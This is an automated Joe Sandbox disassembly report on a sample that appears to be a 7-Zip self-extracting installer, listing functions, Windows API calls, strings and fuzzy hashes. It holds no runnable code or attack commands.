Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??3@$FileTime$AttributesSystemlstrlen
String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 4038993085-2279431206
Opcode ID: e2e9c0809e9bc3cca90199b30f9b7e4bb774994a3498fa8d8027c2002ddee9c1
Instruction ID: 637b7b13a9bcd1d52ea1019587bfa2fb4435f6835f564ae220b3123002230846
Opcode Fuzzy Hash: e2e9c0809e9bc3cca90199b30f9b7e4bb774994a3498fa8d8027c2002ddee9c1
Instruction Fuzzy Hash: CE312D71D0021EEACF05EF92CD429EEBBB4BF44318F10042BE911762E1DB785649DB98

Function 0040755F Relevance: 10.6, APIs: 7, Instructions: 63timethreadinjectionCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000000), ref: 00407579
KillTimer.USER32(?,00000001), ref: 0040758A
SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
SuspendThread.KERNEL32(00000294), ref: 004075CD
ResumeThread.KERNEL32(00000294), ref: 004075EA
EndDialog.USER32(?,00000000), ref: 0040760C

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: DialogThreadTimer$KillResumeSuspend
String ID:
API String ID: 4151135813-0
Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D

Function 00404E3F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000025,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85

Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6

??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000025,004177C4,004177C4,00000000,00000025,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
wsprintfA.USER32 ref: 00404EBC

Strings

;!@InstallEnd@!, xrefs: 00404E59
;!@Install@!UTF-8!, xrefs: 00404E4A
:Language:%u!, xrefs: 00404EB6

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??3@$wsprintf
String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 2704270482-1550708412
Opcode ID: 7515f3c378dc653de5be2f700fb88d196d5ad6fff9ca6d0fef850a5bff4b34ed
Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
Opcode Fuzzy Hash: 7515f3c378dc653de5be2f700fb88d196d5ad6fff9ca6d0fef850a5bff4b34ed
Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799

Function 00403880 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932

Strings

%%T/, xrefs: 004038E4
%%T\, xrefs: 004038A6

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??3@
String ID: %%T/$%%T\
API String ID: 613200358-2679640699
Opcode ID: 9bca89f2fab22d944cbc1d50cb8e29a5624cbb02733552bbeda1c8d4c186658e
Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
Opcode Fuzzy Hash: 9bca89f2fab22d944cbc1d50cb8e29a5624cbb02733552bbeda1c8d4c186658e
Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98

Function 0040393B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED

Strings

%%S\, xrefs: 00403961
%%S/, xrefs: 0040399F

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??3@
String ID: %%S/$%%S\
API String ID: 613200358-358529586
Opcode ID: e3b70a995be6e898b0b314c58b201ee2695760fe101ea1f38fcc60c70cbcb614
Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
Opcode Fuzzy Hash: e3b70a995be6e898b0b314c58b201ee2695760fe101ea1f38fcc60c70cbcb614
Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98

Function 004039F6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8

Strings

%%M\, xrefs: 00403A1C
%%M/, xrefs: 00403A5A

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??3@
String ID: %%M/$%%M\
API String ID: 613200358-4143866494
Opcode ID: a08b7da797f9f27da56c511d10cc8b4fe2326b5189664468d4e6b69bcfc696d5
Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
Opcode Fuzzy Hash: a08b7da797f9f27da56c511d10cc8b4fe2326b5189664468d4e6b69bcfc696d5
Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58

Function 0040E456 Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 42COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE

Strings

4JA, xrefs: 0040E4AF
xJA, xrefs: 0040E493
hJA, xrefs: 0040E49A
$JA, xrefs: 0040E4B6
TJA, xrefs: 0040E4A1
DJA, xrefs: 0040E4A8

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ExceptionThrow
String ID: $JA$4JA$DJA$TJA$hJA$xJA
API String ID: 432778473-803145960
Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C

Function 0040C0DC Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 243COMMON

Download Yara Rule

APIs

Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B

??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D

Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00

??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245

Strings

IA, xrefs: 0040C11B
IA, xrefs: 0040C0EC
IA, xrefs: 0040C12D

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??2@$??3@$memmove
String ID: IA$IA$IA
API String ID: 4294387087-924693538
Opcode ID: 22ff6adae0059519abcdcb5d952883f4cd1f1e51cc0638883f64576781f465c4
Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
Opcode Fuzzy Hash: 22ff6adae0059519abcdcb5d952883f4cd1f1e51cc0638883f64576781f465c4
Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54

Function 0040E811 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898

Strings

IA, xrefs: 0040E818, 0040E841

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??2@??3@ExceptionThrowmemcpy
String ID: IA
API String ID: 3462485524-3293647318
Opcode ID: 12236f9090ed8b96f5aeb47e9cfeefec7a8f36d4de3807175efa3ac18e6d1e15
Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
Opcode Fuzzy Hash: 12236f9090ed8b96f5aeb47e9cfeefec7a8f36d4de3807175efa3ac18e6d1e15
Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794

Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00401029
wsprintfW.USER32 ref: 00401049
lstrcatW.KERNEL32(?,?), ref: 0040105C
ExitProcess.KERNEL32 ref: 00401084

Strings

0x%p, xrefs: 00401043

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: wsprintf$ExitProcesslstrcat
String ID: 0x%p
API String ID: 2530384128-1745605757
Opcode ID: b249aacb09f47677336a249b8d18a2638e0221cc442200049396670476c8e20b
Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
Opcode Fuzzy Hash: b249aacb09f47677336a249b8d18a2638e0221cc442200049396670476c8e20b
Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA

Function 00407A3A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9

GetSystemMetrics.USER32(00000007), ref: 00407A51
GetSystemMetrics.USER32(00000007), ref: 00407A62
??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29

Strings

100%% , xrefs: 00407A81, 00407A88, 00407AE1

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: MetricsSystem$??3@
String ID: 100%%
API String ID: 2562992111-568723177
Opcode ID: 2743aec1773a9f53ad08651ca6e1debfd9a7ea2132d482739a2d831aa28a9c2f
Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
Opcode Fuzzy Hash: 2743aec1773a9f53ad08651ca6e1debfd9a7ea2132d482739a2d831aa28a9c2f
Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99

Function 00407998 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00407A12

Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B

GetDlgItem.USER32(?,000004B3), ref: 004079C6

Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB

??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4

Strings

(%u%s), xrefs: 00407A0C

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: TextWindow$ItemLength$??3@wsprintf
String ID: (%u%s)
API String ID: 3595513934-2496177969
Opcode ID: fd64b36e949843e5f7cde4032f4744e34e1525db11abe46e5bd4feb7fcd38a8e
Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
Opcode Fuzzy Hash: fd64b36e949843e5f7cde4032f4744e34e1525db11abe46e5bd4feb7fcd38a8e
Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68

Function 004021ED Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
GetProcAddress.KERNEL32(00000000), ref: 00402211

Strings

GetNativeSystemInfo, xrefs: 00402200
kernel32, xrefs: 00402205

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32
API String ID: 2574300362-3846845290
Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE

Function 00402185 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
GetProcAddress.KERNEL32(00000000), ref: 0040219F

Strings

Wow64RevertWow64FsRedirection, xrefs: 0040218E
kernel32, xrefs: 00402193

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32
API String ID: 2574300362-3900151262
Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C

Function 004021B9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
GetProcAddress.KERNEL32(00000000), ref: 004021D1

Strings

kernel32, xrefs: 004021C5
Wow64DisableWow64FsRedirection, xrefs: 004021C0

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32
API String ID: 2574300362-736604160
Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC

Function 00402A69 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F

Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??3@$ByteCharMultiWide
String ID:
API String ID: 1731127917-0
Opcode ID: e07bd45234e4f9196ba527e0f03cba738ebe7196a7f337a617a5ad915191ea77
Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
Opcode Fuzzy Hash: e07bd45234e4f9196ba527e0f03cba738ebe7196a7f337a617a5ad915191ea77
